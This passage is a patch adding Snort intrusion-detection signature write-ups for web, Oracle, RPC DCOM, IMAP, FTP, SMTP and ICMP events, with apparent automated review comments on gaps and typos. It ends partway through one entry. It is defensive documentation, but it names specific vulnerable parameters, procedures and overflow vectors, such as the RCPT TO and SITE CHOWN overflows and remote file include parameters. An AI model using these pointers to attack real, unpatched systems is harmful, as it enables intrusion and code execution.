+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
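Review bot: this entry never says which CGI application or request pattern the rule matches, so the Summary, Detailed Information and Affected Systems ("All systems running CGI applications") are pure boilerplate and give an analyst nothing to triage against; the entry should name the script or URI the rule looks for and the vulnerable versions. The Attack Scenarios paragraph about supplying credentials to an authentication mechanism does not follow from the Summary, which describes exploiting a known vulnerability. Typo in Detailed Information: "running ona web server".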
--- /dev/null
+++ b/doc/signatures/1614.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1614
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
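Review bot: like the 1308 entry in this patch, this one carries no specifics: "Many known vulnerabilities exist for each implementation and the attack scenarios are legion" tells the reader nothing about what sid 1614 actually detects, and with that gap "False Positives: None known" cannot be justified. Name the server or application, the request the rule matches, and the reference (CVE, Bugtraq or vendor advisory) the rule was written from.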
--- /dev/null
+++ b/doc/signatures/2819.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2819
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_column_group_from_flavor
+. This procedure is included in
+sys.dbms_repcat_fla_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
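Review bot: the procedure name in Detailed Information is split by a stray line break (the sentence continues on the next line with ". This procedure is included in"), which looks like an artifact of the template the Oracle entries were generated from; join it so drop_column_group_from_flavor reads as one token in its sentence. Affected Systems reads "Oracle Oracle9i" (duplicated word) and Corrective Action lacks a final full stop. Additional References is empty; the Oracle alert or CVE covering these dbms_repcat overflows should be listed so the patch level can be verified.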
--- /dev/null
+++ b/doc/signatures/602.txt
@@ -0,0 +1,57 @@
+Rule: 
+
+--
+Sid: 602
+
+--
+Summary: 
+This event is generated when an attempt to login using the "bin" account is made.
+
+--
+Impact: 
+An attacker may have gained the ability to initiate a remote interactive session on the server.
+
+--
+Detailed Information: 
+This event is generated when a connection using the "bin" account via  "rsh" is attempted. 
+
+This activity is indicative of attempts to abuse hosts using a default configuration. 
+
+Some UNIX systems used to ship with "bin" account enabled and no password required. Similarly, the "rshd" service was also enabled. This allowed an attacker to connect to the machine and establish an interactive session using the "bin" account.
+
+--
+Attack Scenarios: 
+An attacker finds a machine with default account "bin" and "rshd" service running and connects to it, then escalates his privileges to "root"
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+--
+False Positives: 
+None Known
+
+--
+False Negatives: 
+If a local username is not the same as the remote one ("bin"), the rule will not generate an event.
+
+--
+Corrective Action: 
+Investigate logs on the target host for further details and more signs of suspicious activity
+
+Use ssh for remote access instead of rlogin.
+
+--
+Contributors: 
+Original rule by Max Vision <vision@whitehats.com> modified from a signature written by Ron Gula
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+http://www.whitehats.com/info/IDS384
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0651
+
+--
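Review bot: Corrective Action says "Use ssh for remote access instead of rlogin", but the Detailed Information and False Negatives sections describe an "rsh"/"rshd" connection; the advice should name rsh (or the r-services generally) and, since the Detailed Information identifies an enabled rshd plus a passwordless "bin" account as the precondition, recommend disabling rshd and ensuring the "bin" account has no password and no login shell. The Attack Scenarios and Ease of Attack lines lack closing full stops.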
--- /dev/null
+++ b/doc/signatures/2351.txt
@@ -0,0 +1,87 @@
+Rule:
+
+--
+Sid:
+2351
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+This vulnerability is also exploited by the Billy/Blaster worm. The worm
+also uses the Trivial File Transfer Protocol (TFTP) to propagate. A 
+number of events generated by this rule may indicate worm activity.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists. This is also exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Block access to port 69 used by the worm to propogate.
+
+Block access to port 4444 used by the worm.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-026.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0352
+
+Symantec:
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html
+
+--
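Review bot: the Attack Scenarios paragraph ("a request for a file with an overly long filename via a network share") does not match the Detailed Information, which describes malformed RPC requests to an RPC port; either explain how the long filename reaches the DCOM interface over RPC or rewrite the scenario in terms of the RPC ports (135, 139, 445) listed in Corrective Action. Typos: "Expoit" in Ease of Attack, "propogate" in Corrective Action. The worm name "Billy/Blaster" also differs from the Symantec reference title (w32.blaster.worm); consider naming it as the reference does.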
--- /dev/null
+++ b/doc/signatures/100000442.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000442
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "MiraksGalerie" application running on a webserver. Access to the file "pcltar.lib.php" using a remote file being passed as the "g_pcltar_lib_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "g_pcltar_lib_dir" parameter in the "pcltar.lib.php" script used by the "MiraksGalerie" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using MiraksGalerie
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
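Review bot: the third Detailed Information paragraph (client credential validation, escalated privileges, trust relationships) is copied from the generic CGI template and does not describe a remote file include in "pcltar.lib.php"; the same goes for the Attack Scenarios text about supplying credentials to an authentication mechanism. Replace both with the actual mechanism: a URL supplied in the "g_pcltar_lib_dir" parameter is included and executed by the script. Wording: "an exploitation attempt has been attempted" is tautological, "ona web server" is a typo, and the Affected Systems block lacks the blank line before "--" that the other entries use.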
--- /dev/null
+++ b/doc/signatures/654.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+654
+
+--
+Summary:
+When connecting to port 25 (SMTP) on a computer running a vunarable SMTP server it is possible to perform a DoS attack. In some cases it might be possible to perform a security breach as well.
+
+--
+Impact:
+Depending on the vunerable software you may need to restart the SMTP server or perform some level of incident response.
+
+--
+Detailed Information:
+Vulnerable systems:
+	Avirt Mail 4.0 (build 4124)
+	Avirt Mail 4.2 (build 4807)
+	PakMail SMTP/POP3
+	Netscape Messaging Server 3.54/3.55/3.6
+
+More details can be found on the various sites listed below as the impact and details vary from system to system.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+Supply a large amount of data after the RCPT TO: header in your SMTP flow.
+
+--
+Ease of Attack:
+DoS: rather easy
+Security breach: probably hard
+
+--
+False Positives:
+These will occur rather frequently with the given rule. They are most common when subscribed to mailinglists.
+
+--
+False Negatives:
+None Known
+
+
+--
+Corrective Action:
+Upgrade software according to the instructions of your software manufacturer.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Hugo van der Kooij <hugo@vanderkooij.org>
+Josh Gray	Edits
+
+-- 
+Additional References:
+http://www.securiteam.com/exploits/6C00O1F00Y.html
+http://www.synnergy.net/downloads/advisories/SLA-2000-01.pakmail.txt
+http://online.securityfocus.com/bid/748
+
+--
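Review bot: the vulnerable product list (Avirt Mail 4.0/4.2, PakMail SMTP/POP3, Netscape Messaging Server 3.54/3.55/3.6) sits under Detailed Information while Affected Systems is empty; move it there. The Attack Scenarios line is written as an instruction to the reader ("Supply a large amount of data ... in your SMTP flow"); rewrite it descriptively, for example "An attacker sends an overly long argument after RCPT TO:". Typos: "vunarable" and "vunerable" (vulnerable), "unkown" (unknown); the "Josh Gray Edits" contributor line should follow the format of the others.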
--- /dev/null
+++ b/doc/signatures/2857.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2857
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure switch_snapshot_master
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
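Review bot: Detailed Information places the vulnerable procedure in "dbms_repcat", without the "sys." schema prefix that the 2819 and 2884 entries use (sys.dbms_repcat_fla_mas, sys.dbms_repcat_conf); make the package naming consistent so the three entries can be matched against the vendor advisory the same way. Same template defects as the sibling entries: the procedure name switch_snapshot_master is cut off by a line break before ". This procedure is included in", Affected Systems reads "Oracle Oracle9i", Corrective Action lacks a full stop, and Additional References is empty.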
--- /dev/null
+++ b/doc/signatures/2884.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2884
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_update_resolution
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
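Review bot: Additional References is empty for the third Oracle entry in a row, leaving "Apply the appropriate vendor supplied patch" with nothing to point to; cite the Oracle alert or CVE covering the sys.dbms_repcat_conf overflow. Formatting: the procedure name comment_on_update_resolution is followed by a line break before ". This procedure is included in", Affected Systems reads "Oracle Oracle9i", and Corrective Action lacks a final full stop.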
--- /dev/null
+++ b/doc/signatures/3158.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3158
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
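Review bot: the Summary, Impact and Detailed Information are word for word the text of sid 2351 in this same patch, so nothing here tells an analyst how 3158 differs (a different port, transport or encoding of the same DCOM request?); state what this rule matches that 2351 does not. Additional References is empty while 2351 lists the MS03-026 bulletin, CAN-2003-0352 and the Symantec write-up; the same references apply. Typo: "Expoit" in Ease of Attack. The Attack Scenarios text ("overly long filename via a network share") has the same mismatch with the RPC description as in 2351.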
--- /dev/null
+++ b/doc/signatures/100000644.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000644
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "user_add.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "user_add.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
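Review bot: the Detailed Information paragraph on credential validation and trust relationships and the Attack Scenarios paragraph on supplying credentials are generic CGI boilerplate and do not describe a remote file include via the "admin_template_path" parameter of "user_add.php"; replace them with the actual mechanism (a remote URL in that parameter is included and executed by the script). Also fix "an exploitation attempt has been attempted" (Summary), "running ona web server" (Detailed Information), and the missing blank line before "--" after Affected Systems.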
--- /dev/null
+++ b/doc/signatures/2118.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2118
+
+--
+Summary:
+This event is generated when a remote user uses invalid data within an
+IMAP LIST command sent to port 143 on an internal server. This may
+indicate an attempt to exploit a buffer overflow vulnerability in the
+IMAP LIST command. This may also affect other IMAP implementations.
+
+Impact:
+Possible shell access on the IMAP server, leading to arbitrary code
+execution. The attacker must have a valid IMAP account on the mail
+server to attempt this exploit.
+
+--
+Detailed Information:
+When a large amount of data is sent to a vulnerable IMAP server in the
+LIST command, a buffer overflow condition may occur. This can allow the
+attacker to access the shell, where arbitrary code can be executed. Note
+that this exploit can only be attempted by a user with a valid IMAP account.
+
+--
+Affected Systems:
+	University of Washington imapd versions 10.234 or 12.264. 
+
+--
+Attack Scenarios:
+An attacker with an IMAP account on the server can send a sufficiently
+long LIST command to the IMAP server, creating a buffer overflow
+condition. This can then allow the attacker to gain shell access on the
+compromised server, possibly leading to the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple. Exploits exist, but the user must have a valid IMAP account on
+the server.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate patches for your operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+--
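Review bot: the "--" separator between Summary and Impact is missing (the blank line ending Summary is followed directly by "Impact:"), which will break any tooling that splits these files on "--". Additional References is empty although Affected Systems pins the issue to University of Washington imapd 10.234 and 12.264; list the CVE or advisory covering the LIST overflow. The Summary's last sentence, "This may also affect other IMAP implementations", also conflicts with Affected Systems naming only UW imapd; either list the others or drop the sentence.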
--- /dev/null
+++ b/doc/signatures/398.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+398
+
+--
+
+Summary:
+This event is generated when An ICMP Host Unreachable for Type of Server datagram is detected on the network.  
+
+--
+
+Impact:
+Routers will generate this message when the requested TOS (Type of Service) is not permitted to transverse the network.  This could be an indication of an improperly configured routing device or a improperly configured host on the network.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large numbers of these messages on the network could indication routing problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no corrective action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
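Review bot: the Summary says "ICMP Host Unreachable for Type of Server" while Impact expands TOS as "Type of Service"; the Summary is the wrong one and should read "Type of Service". Grammar in Impact and Detailed Information: "a improperly configured host" should read "an improperly configured host", "transverse" should read "traverse", and "could indication routing problems" should read "could indicate routing problems". This entry also omits the Affected Systems section present in the other entries and puts a blank line between each "--" and the next heading, unlike the rest of the patch.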
--- /dev/null
+++ b/doc/signatures/1562.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+1562
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow associated with BFTPD version 1.0.13.
+
+--
+Impact:
+Remote root access.  A successful attack can allow the remote execution of arbitrary commands with privileges of root.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a vulnerability associated with the FTP SITE CHOWN command of a BFTPD server 1.0.13. A buffer overflow attack can be executed by sending an overly long argument with the SITE CHOWN command.  This attack requires login access to the vulnerable server via an authenticated or anonymous user.
+
+--
+Affected Systems:
+Hosts running BFTPD version 1.0.13. 
+
+--
+Attack Scenarios:
+An attacker may login to a vulnerable FTP server and supply an overly long file argument with the SITE CHOWN command, causing a buffer overflow and allowing the execution of arbitrary commands as root.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disable the use of the SITE command on the vulnerable server by configuring /etc/bftpd.conf with:
+  ENABLE_SITE=no
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0065
+
+--
--- /dev/null
+++ b/doc/signatures/100000430.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+100000430
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BlueShoes" application running on a webserver. Access to the file "Bs_Faq.class.php" using a remote file being passed as the "APP[path][applications]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "APP[path][applications]" parameter in the "Bs_Faq.class.php" script used by the "BlueShoes" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BlueShoes
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
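Review bot: the Attack Scenarios paragraph does not describe the vulnerability this rule covers. It talks about supplying credentials to "an authentication mechanism", whereas the Summary and Detailed Information describe a remote file include through the "APP[path][applications]" parameter of "Bs_Faq.class.php"; rewrite it around that parameter (a URL pointing at a file the attacker controls) so scenario and rule agree. Since the vulnerable file is a PHP script, Corrective Action could also mention the server-side mitigation of disabling remote file inclusion in the PHP configuration (allow_url_include and allow_url_fopen off); that is a suggestion from general PHP hardening practice, not something the hunk states. Formatting: the `--` separators after the Sid and after Affected Systems lack the blank line used everywhere else, "ona web server" is missing a space, "attackers choosing" wants an apostrophe, and "may indicate that an exploitation attempt has been attempted" is redundant.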
--- /dev/null
+++ b/doc/signatures/2496.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2496
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft RPC service.
+
+--
+Impact:
+Denial of Service (DoS). Possible execution of arbitrary code leading to
+unauthorized remote access to the victim host.
+
+--
+Detailed Information:
+It may be possible for an attacker to cause a DoS condition in the
+Microsoft RPC service when multiple simultaneous requests are made to a
+vulnerable host. This can lead to an exhaustion of system resources
+causing the DoS.
+
+--
+Affected Systems:
+	Windows systems running RPC services
+
+--
+Attack Scenarios:
+An attacker may attempt to bind to the RPC service many times in an
+attempt to cause the DoS condition to occur.
+
+--
+Ease of Attack:
+Difficult.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
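Review bot: the Summary and Detailed Information refer to "a known vulnerability" in the Microsoft RPC service but never identify it, and Additional References is empty, so the reader has nothing to patch against; add the vendor bulletin or CVE for the resource-exhaustion DoS described here. The Ease of Attack rating "Difficult." also sits oddly next to an Attack Scenario that needs only repeated bind attempts to the RPC service; either justify the rating or revise it. Minor: "Apply the appropriate vendor supplied patches" lacks a period.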
--- /dev/null
+++ b/doc/signatures/1663.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1663
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
